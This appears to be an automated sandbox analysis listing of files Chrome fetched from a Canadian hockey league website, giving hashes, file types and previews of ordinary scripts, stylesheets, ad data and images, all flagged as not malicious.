                                                                                                                          Preview:/**. * React (with addons) v0.12.1. */.!function(e){if("object"==typeof exports&&"undefined"!=typeof module)module.exports=e();else if("function"==typeof define&&define.amd)define([],e);else{var f;"undefined"!=typeof window?f=window:"undefined"!=typeof global?f=global:"undefined"!=typeof self&&(f=self),f.React=e()}}(function(){var define,module,exports;return (function e(t,n,r){function s(o,u){if(!n[o]){if(!t[o]){var a=typeof require=="function"&&require;if(!u&&a)return a(o,!0);if(i)return i(o,!0);var f=new Error("Cannot find module '"+o+"'");throw f.code="MODULE_NOT_FOUND",f}var l=n[o]={exports:{}};t[o][0].call(l.exports,function(e){var n=t[o][1][e];return s(n?n:e)},l,l.exports,e,t,n,r)}return n[o].exports}var i=typeof require=="function"&&require;for(var o=0;o<r.length;o++)s(r[o]);return s})({1:[function(_dereq_,module,exports){./**. * Copyright 2013-2014, Facebook, Inc.. * All rights reserved.. *. * This source code is licensed under the BSD-style license found in the. * LICENSE fil
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=12, height=640, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=960], baseline, precision 8, 730x435, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):66915
                                                                                                                          Entropy (8bit):7.894984580065188
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:rSDsNUTofWZm6l5AZ0fmicrgUYDKDODYFMBNKF:rS8aofSl5AsmicrtYT0FmNKF
                                                                                                                          MD5:DB45C9184F115FAB5F8C1916BB5A0FEA
                                                                                                                          SHA1:B4C5B41DD3C5E6DA4333CC3C2BC48A9A37A5B04E
                                                                                                                          SHA-256:8B1886CDEEA97F8EF721DB3B6334C08563031B9E49AC3B1736720F159D908744
                                                                                                                          SHA-512:6EAB575A891430C791016F487757649712413E2AE4BA597FD0E17A90CCEA9E6E89B5973C88A204B9EBC5E8E8EA2CAC24F3577B56BAE1E3DC38F29FCE7CC94A38
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:......JFIF.....H.H.....yExif..MM.*.......................................................................................................(...........1...........2..........i.......................H.......H....Adobe Photoshop CS5 Windows.2020:04:09 10:16:39...........0221...................................1...............................j...........r.(.....................z...................H.......H..........Adobe_CM......Adobe.d................................................................................................................................................._...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..gW.M2......R...5...Hq..6..MY.}I.tz.4..h{..W*.._.L...P..V&.2
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):838
                                                                                                                          Entropy (8bit):4.670822471754643
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:2b7Ksen60AfVXF2ACfiVSApbE3zWlSabWH:C0A1gfMhG36YkWH
                                                                                                                          MD5:49CEA0A781874A962879C2CACA9BC322
                                                                                                                          SHA1:72C1650DE2B93EF320D2DB873FBB473FE360269C
                                                                                                                          SHA-256:57A50C99A31EF4E89E86664E96F6DFBDDE163A2EB96E88B3B492C49AA4BE2F37
                                                                                                                          SHA-512:7EBF5DA4637794CDAB0D199E8B0550E9230A1550804A4CE7FC723A8881E16D12327B9C40BCEECFF54ECE29DDE71BF41E63E8510ADF0827C4CD13C2392E6250A6
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:(function( $ ) {..'use strict';.../**.. * All of the code for your public-facing JavaScript source.. * should reside in this file... *.. * Note: It has been assumed you will write jQuery code here, so the.. * $ function reference has been prepared for usage within the scope.. * of this function... *.. * This enables you to define handlers, for when the DOM is ready:.. *.. * $(function() {.. *.. * });.. *.. * When the window is loaded:.. *.. * $( window ).load(function() {.. *.. * });.. *.. * ...and/or other possibilities... *.. * Ideally, it is not considered best practise to attach more than a.. * single DOM-ready or window-load handler for a particular page... * Although scripts in the WordPress core, Plugins and Themes may be.. * practising this, we should strive to set a better example in our own work... */..})( jQuery );.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JSON data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):69641
                                                                                                                          Entropy (8bit):5.924184708500487
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:TV98glRj5nDFvSCd1CORJL5nOVMC5xhGZ1Y:h984ZPvSCdL71YGM
                                                                                                                          MD5:EC25FA4335D535668F0838DA327F76D5
                                                                                                                          SHA1:EDE49FC71DD8A4FF12B3EA30D3D2D16176571633
                                                                                                                          SHA-256:A18F41AD8F7EF2F02E47B37947AD6C088288BAD763BA8D10DC6109264FCC957A
                                                                                                                          SHA-512:8A59C3F7F523579E4CD1B83F179C1696EEF0DCDEF7799E653619437B0FCCF387DB857CE30255AFB7E85914E5D9E6B3EB1B075FFA694CC6232BED5DC1E9B847DF
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:{"/128473736/GTHL_Leaderboard":["html",0,null,null,0,90,728,0,0,null,null,null,1,[["ID=780647d4636bd91c:T=1736802084:RT=1736802084:S=ALNI_MZ08FEWPGliOW0lI_nPr8KxchgCJw",1770498084,"/","gthlcanada.com",1],["UID=00000fcdc44cc91c:T=1736802084:RT=1736802084:S=ALNI_Mbh-AwixrxyzX6Xj5Qpy4NHg9Jupw",1770498084,"/","gthlcanada.com",2]],[138477671952],[6736155286],[1138327936],[3553617818],null,null,null,null,null,null,null,0,null,null,null,null,null,null,"AOrYGsmcUdvfg2pn4rzYnr09OUZX0bRIq492CCcNNpgRQBUt4qQ_0QFAaM0XMEKPX-CYjixlfiy6V4VC1Bcodg","CJL3nPrL84oDFaYLTwgdG4cCmQ",null,null,null,null,null,null,null,null,null,null,null,null,null,null,"2",null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,[["ID=4b44419d7b81f23d:T=1736802084:RT=1736802084:S=AA-AfjajORvLokM1V4L-S0N3D9kO",1752354084,"/","gthlcanada.com"]],[]]}.<!doctype html><html><head><script>var jscVersion = 'r20250109';</script><script>var google_casm=[];</script><style>a { color: #000000 }</style><scr
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (2008)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):13020
                                                                                                                          Entropy (8bit):5.338335125035746
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:pl/66sGOASROqI3wgh5MXnYY9EAhMmK3qzfaGxCLLgIJQaYmx:rnsGN6JIVs3LLK3qzf6gIZYmx
                                                                                                                          MD5:D1F231B50B152372A6C3100F4AED1973
                                                                                                                          SHA1:1BF10951BE06DA03D1371A904E19C0419F2A3637
                                                                                                                          SHA-256:9DEC95894AF322B087AB6E87F9C8CE66D849646CF33B375D33C957F4569ED081
                                                                                                                          SHA-512:00093B7FC4AFFA2D2230622F5D7DA69730246B74620AD4DE30AC64E41FB9AC927AFD2AB426034D71DC85A3DFEE9A46E73DF48DA7E2636A54579EA9AAAC4CAFF6
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://ep2.adtrafficquality.google/sodar/sodar2/232/runner.html
                                                                                                                          Preview:<!DOCTYPE html>.<meta charset=utf-8><script>.(function(){'use strict';function m(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var p=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function aa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var r=aa(this),u=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",v={},w={};function x(a,b,c){if(!c||a!=null){c=w[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}}.function y(a,b,c){if(b)a:{var e=a.split(".");a=e.length===1;var f=e[0],h;!a&&f in v?h=v:h=r;for(f=0;f<e.length-1;f++){var d=e[f];if(!(d in h))break a;h=h[d]}e=e[e.length-1];c=u&&c==="es6"?h[e]:null;b=b(c);b!=null&&(a?p(v,e,{config
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):68311
                                                                                                                          Entropy (8bit):4.756171637544234
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:eKvcqyF7I4rb84WLMWKvcqyF7I4rb84WLMg:k/MLMc/MLMg
                                                                                                                          MD5:7DA92CD266069217C0F8EB0098C5193D
                                                                                                                          SHA1:A77355F299EF7098A8599B591EECE56246FD603C
                                                                                                                          SHA-256:6DAF416F915E77243B8B68BAADA9EAE0FFF34CFFB447300F114757C9B488A704
                                                                                                                          SHA-512:A95E61A6C856E7B10FA63B0B4D247A5200E0317510663C414832E001A8D603DABDE762830A0B076B32D2EA51998D0AB9E88B29502E28F123B2FDF453C087DF7A
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://cdnjs.cloudflare.com/ajax/libs/material-design-iconic-font/2.1.2/css/material-design-iconic-font.min.css
                                                                                                                          Preview:@font-face{font-family:Material-Design-Iconic-Font;src:url(../fonts/Material-Design-Iconic-Font.woff2?v=2.1.0) format('woff2'),url(../fonts/Material-Design-Iconic-Font.woff?v=2.1.0) format('woff'),url(../fonts/Material-Design-Iconic-Font.ttf?v=2.1.0) format('truetype')}.zmdi{display:inline-block;font:normal normal normal 14px/1 'Material-Design-Iconic-Font';font-size:inherit;text-rendering:auto;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.zmdi-hc-lg{font-size:1.33333333em;line-height:.75em;vertical-align:-15%}.zmdi-hc-2x{font-size:2em}.zmdi-hc-3x{font-size:3em}.zmdi-hc-4x{font-size:4em}.zmdi-hc-5x{font-size:5em}.zmdi-hc-fw{width:1.28571429em;text-align:center}.zmdi-hc-ul{padding-left:0;margin-left:2.14285714em;list-style-type:none}.zmdi-hc-ul>li{position:relative}.zmdi-hc-li{position:absolute;left:-2.14285714em;width:2.14285714em;top:.14285714em;text-align:center}.zmdi-hc-li.zmdi-hc-lg{left:-1.85714286em}.zmdi-hc-border{padding:.1em .25em;border:solid .1em #9e9
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 38x38, segment length 16, baseline, precision 8, 730x411, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):73709
                                                                                                                          Entropy (8bit):7.970386207474714
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:v3YdNmxeNmMxRy2iUXwFaNEauoVsZr6aj3/z1JUXiBRwiy:QCLSJiKQaruoy6QnjBR/y
                                                                                                                          MD5:1FCAF6CB7F3245B889C037FFD95317F0
                                                                                                                          SHA1:751F35EC12FC6B7F224F3D5AE2DD49FDD683172C
                                                                                                                          SHA-256:A95A3DAEE365648CCC51C7B0781A098BAA1C23CA9ADCF8929366ACFCBE2F769C
                                                                                                                          SHA-512:5096BF23FF7E56EFD74D0CEFB1EDBFE08E0DD650C167B89FD7E87F53D3F890981CBC45C6EBCC8E4839E78782338190D0973B06D6F1F3010F817A5B555BD51626
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:......JFIF.....&.&.....C....................................................................C............................................................................"..........................................O...........................!.1.AQa."q.2....#BR......$3Cbr..S.%c....45s.....'..................................:.......................!1.A.."Q..2a.q..B.....#3...R.$4C.............?..3=.x..f....8X8.#...9...Ns. ....}.|..Q.EKh..z...T...r}#...5.N}`....q>l......>....!."}I ......K........J.....+O.....m.v.\..[iX;.y.\....@....9.#8$...3.J..<...Q.. .xT..U...T1....MM.;..."....\.."!.A...v.>&.J.....V...x.1.iI-Jh.. ..6][i)............M.,.aN.c#.K].;t.-.(.H.q.1....k ..D2..V.YZ.U.y..>,.s...V..iZ....C.T..o...J...m..~p.s.=.."...J.......iof.......j]8Wp2s..`.g....=..g.)l....!.f.mm$..H.~.:.R.....[.u.......A.1. 4.....b...x....=.YM}..y.V8#....{.)'.k..i*$....zJ.v.w..3V...'.s....v{..%n.Q[..B8.....V.....y..e;...<.@-..U.........Qj.rv.C9<c.;.Z..eP.NW..x.QmY'nF2H..a~.vQD.HX.0j.h.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (310)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):97370
                                                                                                                          Entropy (8bit):4.776237467674083
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:FAo7ze4UOv8BBKnNAFaLjkl7OO+Ea2ws7DW7OzmUwOQwODP6zG868:FAqacqdgOD0Y
                                                                                                                          MD5:8B1FDB6435CA86B46A829500AB03CA62
                                                                                                                          SHA1:8790244A9A5E0F61A74EDCD5EB82EF267E1186A7
                                                                                                                          SHA-256:9980DBCC984E362A0E37696944494FF6EEF01C142A01A0950482F3CADAA5FA8B
                                                                                                                          SHA-512:93959F828F170BF84C477783A38EF8603EE00DFDB8B3558082118D25FC1E8FAF489E1C9ED279CF7D719DB7480D50F1207C07797A65F3226F1A7F1A3D3DEFD452
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://gthlcanada.com/app/plugins/tagged_content_blocks/public/css/tagged-content-blocks-public.css?ver=1.0.0
                                                                                                                          Preview:/**. * Foundation for Sites by ZURB. * Version 6.4.4-rc1. * foundation.zurb.com. * Licensed under MIT Open Source. */. .tcb .tcb-items-2,. .tcb .tcb-items-3,. .tcb .tcb-items-4 {. margin-bottom: 15px; }. .tcb .tcb-items-2 .tcb-content,. .tcb .tcb-items-3 .tcb-content,. .tcb .tcb-items-4 .tcb-content {. position: absolute;. left: 0;. right: 0;. bottom: 0;. background: transparent; }. .tcb .tcb-items-2 .tcb-link,. .tcb .tcb-items-3 .tcb-link,. .tcb .tcb-items-4 .tcb-link {. height: 100%; }. .tcb .tcb-items-2 .tcb-top,. .tcb .tcb-items-2 .tcb-bottom,. .tcb .tcb-items-3 .tcb-top,. .tcb .tcb-items-3 .tcb-bottom,. .tcb .tcb-items-4 .tcb-top,. .tcb .tcb-items-4 .tcb-bottom {. position: relative;. z-index: 30;. background: white; }. .tcb .tcb-items-2 .tcb-content-items-container,. .tcb .tcb-items-3 .tcb-content-items-container,. .tcb .tcb-items-4 .tcb-content-items-container {. height: 100%;. border: 1px solid #e0e0e0;
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (1434), with no line terminators
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):1434
                                                                                                                          Entropy (8bit):5.765556935416344
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:2jkm94/zKPccAv+KVCe2TLph9gFB5vtADjkrDQndcl/1t4glvllLtFtD1INxsLqJ:VKEctKo7LmvtUjPKtX7ftD1INOLrwUnG
                                                                                                                          MD5:764EE6309BF4800054E4A2A67DEB3575
                                                                                                                          SHA1:2FFD2FDA8E49AD861B75DE1E5ED583D8CE1D5B0A
                                                                                                                          SHA-256:652E8677AEC33767D2A5F229384F79B4F526104BF7E94D7D258070F94743C3CC
                                                                                                                          SHA-512:4333F5A85D3085C54ACF34632CFDD57CF7EEA2D539C5CEFC1DBD07A6486083CAC1C1DA6BADB9743FD01BCDEE63AEFB187074A6BF7AB945BC897E227E1C4F5C6D
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://www.google.com/recaptcha/api.js
                                                                                                                          Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('onload');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true; po.charset='utf-8';var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='A/kargTFyk8MR5ueravczef/wIlTkbVk1qXQesp39nV+xNECPdLBVeYffxrM8TmZT6RArWGQVCJ0LRivD7glcAUAAACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.getValue().then(function(l){if(l!=='treatment_1.1'&&l!=='treatment_1.2'&&l!=='control_1.1'){d.head.prepend(m)
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 240x240, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=10, manufacturer=Canon, model=Canon EOS 5D Mark IV, xresolution=162, yresolution=170, resolutionunit=2, software=Adobe Lightroom 7.3 (Macintosh), datetime=2024:06:09 14:44:45], baseline, precision 8, 730x487, components 3
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):117751
                                                                                                                          Entropy (8bit):7.857282144413212
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:z+V9bk9vuGf3qBTeRcwz1JeYvvSTHfWKxP:29b6XfaBT0H1JJvvwHeKx
                                                                                                                          MD5:7629A9E02FDD4EB994AF9913381DFB63
                                                                                                                          SHA1:27B457A47A22F28A0F931DA79B87802746590041
                                                                                                                          SHA-256:29EE69914722262D4B6CBD80478616701E0D55FE13238A358B29E00D81525E47
                                                                                                                          SHA-512:447B5FCA8409EF9E0A476FB1CEB8BA2515B5325D110FB0E5A5463D661DD2047C2D708467706CB0EAEF9700EEDD9AD9E78A0DB5FF7CD934FDB732D6B266DCA890
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/06/28105107/0C9A9391-730x487.jpg
                                                                                                                          Preview:......JFIF............J.Exif..II*.......................................................(...........1... .......2...........;.......................i...........d...Canon.Canon EOS 5D Mark IV..................Adobe Lightroom 7.3 (Macintosh).2024:06:09 14:44:45.ALEX TE.ALEXJSTE..!........................."...........'...........0...........2...................0231........................................................................................................................................................00..........00..................................................................................................1...........2....... ...4.......@...5.......X.......................2024:06:06 21:18:29.2024:06:06 21:18:29.-04:00..-05:00..-05:00..X.y.@B...T-.@B............................f......\D.....192156000129..........F.......................EF24-70mm f/2.8L II USM.1517002438........................................(...............................*G..............................
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 38x38, segment length 16, baseline, precision 8, 730x411, components 3
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):28149
                                                                                                                          Entropy (8bit):7.852956307402661
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:CQPlftPvgU5xt64R7We4hDUtPZSd+XHmNTSNOXxn:VxthTF4hYtB0+XHmVSg
                                                                                                                          MD5:5CD3006547A71F04F0591C3CDF4F23E2
                                                                                                                          SHA1:196BC7234BF3D2F40E86665A648876EF2D42E6EE
                                                                                                                          SHA-256:6417BC73FF327CF6BC02FEFAA00772BBD719885D48652F8D0B44765D4D4CEDB1
                                                                                                                          SHA-512:4A2019D14AC4507AD29A9DD52C95A4C76D0EF2DD783F8DB6A2BFA53839261AD9B701EBC3668BC559FE247AFEBBC2D8923ADA7672A30FDE41919265E4E3CF4D19
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2025/01/06205151/DECAA-Title-1600x900-GTHL-Power-Rankings-730x411.jpg
                                                                                                                          Preview:......JFIF.....&.&.....C....................................................................C............................................................................"..........................................Z.........................1..!Q..A.."Waq......2.....#45BRUs....6TVbrt.$%37CGSu........D.c..................................I..........................!1A..Qa....Rbq...."2Scr......#4B..35.CD..6s..............?.. ..s...............p....YSR.......{.....cYQ../.],..M.....K......'.%...mci[IJt..a..seMK..scW.5.:.u/..(..V..9e.J...-..t.J..[.x.k.1[.......D.R.R[.....4........(..........Iq.....].....@....*.@.........qb......5.....A-.I`.R..hI.................`.....B..(..`.....................^.e...@.|.9....7m.....{>.4kY2._...o."..15_.....t...+.#...t...;.|..z..-ToG1..V.,.....|..q..N[.Kw.......[..........c....g....u~..........seMK..skW.5.7....eYQ../.],..K............'.%..Kk.J.JS$.{.O..*jX.......a.Z.P.....A.l.-..Q.z....U.X...n5.....]..{..$*..*...%.....H]Hd..e..........
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=10, manufacturer=Apple, model=iPhone 14 Pro Max, orientation=upper-left, xresolution=158, yresolution=166, resolutionunit=2, software=Adobe Photoshop 24.0 (Macintosh), datetime=2024:07:17 14:01:13, GPS-Data], baseline, precision 8, 730x541, components 3
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):120264
                                                                                                                          Entropy (8bit):7.944302592525603
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:+mLqnbWy714mgkUMe3Lj2SS2yUK+70PiYsHBNa0g5UrHYurCIE7RRBRk:+lnSyQkQbj2SS2JrFYsvF14urCpPTk
                                                                                                                          MD5:222850DD1DCED31817C2E8B8E25C79DA
                                                                                                                          SHA1:CD053AE58884541DE1996EB40B0C5B28A463F6D6
                                                                                                                          SHA-256:8AE24E2835ADD51B3286B2370FC2718FC76DFDA8731202B1081C48B1792C2B1D
                                                                                                                          SHA-512:196945F29F36596037C177EAA0931C199200D8F06EAC9519AD53931897C96383D2C5B04DC3DD0CD3B1F3914DE897A48A1160742F43AC9C13966167F4BC6F74CD
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/07/17140151/IMG_1192-730x541.jpg
                                                                                                                          Preview:......JFIF.....H.H....#.Exif..MM.*...................................................................(...........1.....!.....2..........i..........%.............LApple.iPhone 14 Pro Max....H.......H....Adobe Photoshop 24.0 (Macintosh).2024:07:17 14:01:13..........................."...........'..................0232.................................................................................................................................s...........................................................<...Y...2.. w..0...............J............W...2............N.......................W...........................................................K.......................T..............&........T..........................6...........B.......+.......2...........d...O...............h...d..B...............................%...U0..v.......v.....2024:07:08....{....R.........................................(................................ =.......H.......H..........Adobe_CM......Adobe.d.....
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):42
                                                                                                                          Entropy (8bit):2.9881439641616536
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                          MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                          SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                          SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                          SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:GIF89a.............!.......,...........D.;
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 38x38, segment length 16, baseline, precision 8, 730x411, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):28149
                                                                                                                          Entropy (8bit):7.852956307402661
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:CQPlftPvgU5xt64R7We4hDUtPZSd+XHmNTSNOXxn:VxthTF4hYtB0+XHmVSg
                                                                                                                          MD5:5CD3006547A71F04F0591C3CDF4F23E2
                                                                                                                          SHA1:196BC7234BF3D2F40E86665A648876EF2D42E6EE
                                                                                                                          SHA-256:6417BC73FF327CF6BC02FEFAA00772BBD719885D48652F8D0B44765D4D4CEDB1
                                                                                                                          SHA-512:4A2019D14AC4507AD29A9DD52C95A4C76D0EF2DD783F8DB6A2BFA53839261AD9B701EBC3668BC559FE247AFEBBC2D8923ADA7672A30FDE41919265E4E3CF4D19
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:......JFIF.....&.&.....C....................................................................C............................................................................"..........................................Z.........................1..!Q..A.."Waq......2.....#45BRUs....6TVbrt.$%37CGSu........D.c..................................I..........................!1A..Qa....Rbq...."2Scr......#4B..35.CD..6s..............?.. ..s...............p....YSR.......{.....cYQ../.],..M.....K......'.%...mci[IJt..a..seMK..scW.5.:.u/..(..V..9e.J...-..t.J..[.x.k.1[.......D.R.R[.....4........(..........Iq.....].....@....*.@.........qb......5.....A-.I`.R..hI.................`.....B..(..`.....................^.e...@.|.9....7m.....{>.4kY2._...o."..15_.....t...+.#...t...;.|..z..-ToG1..V.,.....|..q..N[.Kw.......[..........c....g....u~..........seMK..skW.5.7....eYQ../.],..K............'.%..Kk.J.JS$.{.O..*jX.......a.Z.P.....A.l.-..Q.z....U.X...n5.....]..{..$*..*...%.....H]Hd..e..........
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 38x38, segment length 16, baseline, precision 8, 730x411, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):107606
                                                                                                                          Entropy (8bit):7.968074633182128
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:L4zKV2qZPxg3x+d7JOgN8axXw7AE9Eiuhznvq9k:kKVbPg3xcOgtxGAE9En5x
                                                                                                                          MD5:B2EAE4C054996B0AF3FB67696E2F8D86
                                                                                                                          SHA1:F8C8870DA49034AD37306ED188DCF26E0E7F3DAC
                                                                                                                          SHA-256:7CD4ED50BE0D8298927786783E34A59D16893AF326021B33C0B9A51A8FE6E510
                                                                                                                          SHA-512:3B6BAE71BD48FCB1CD7D155367203750DE272D3FE813B74A817AF8DAC498F61BC14BD4CDD47BC37E26DF070A2BDB95EC43F11C56D47A6EBAE18050517BBCEE8C
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:......JFIF.....&.&.....C....................................................................C............................................................................".........................................P..........................!..1AQ"a..2q.#..BR..3b....$r..C.%Ss...4EU....Tc.......................................:.........................!.1A."Q.a.2q.....#3BR.....$S.rb............?..........UMBd!ZXrB.J@...+...%BUp-.."c.....z.%.JA.I@ .^.*...J..Fl2.2....r{k.n.x^.....RvWk}.'J.V..tRY%....,z..t.Ouo.l/.....fRdT.G.V..{....'e.B.X.:2.R..d.....W.|uN....R.V....C..-u^....r.Iq..........:.W>-...Q....:.Q..JB...IW.W......S0....&K......a.X.9Q...4.%E.fN......7.9...2Xa... .........M. ....O...t.J..}..n........UU.'..!...Xe..kq.@.T.M....JaH.d%-.B."..@\.CTd1.$". ....!.+'.....{.|.8.9..s+..n<.4..F...m......z~...J..~bOp....P'.O.G......+PmJO@OM...Q.....c..o..5........;.U....OM.....Jm.Z.bzc..R..X+..'...e.*V..".4...s.s.S...n0.....l....di.L.@.b......)..D%..|.......lX|,..#.YB
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 38x38, segment length 16, baseline, precision 8, 730x411, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):58245
                                                                                                                          Entropy (8bit):7.976723136113466
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:JILw7ngG4DEtxy0gTFOLjqbEj9PYambrSF2rkJtVUBboOTdzt:8SRmEaOqCYa64cboOTBt
                                                                                                                          MD5:E1E5E3BA30B15EFF39C28D582FF542F0
                                                                                                                          SHA1:0E788F47999344C2B72007C928A12348FF7AE43D
                                                                                                                          SHA-256:1049972A117ECA446960DD8EC303EC61B89C0C8608909326B111E55F44F70EFA
                                                                                                                          SHA-512:4475DC5E6CDF1DDB5E4F0195ADA83FBC6FBB569FEFD28381C3089B7D3BC38B7ED56AAB3E545662EA99CE57EE1C6BF35857D3A82A90CC55322F764560B1E1CA05
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
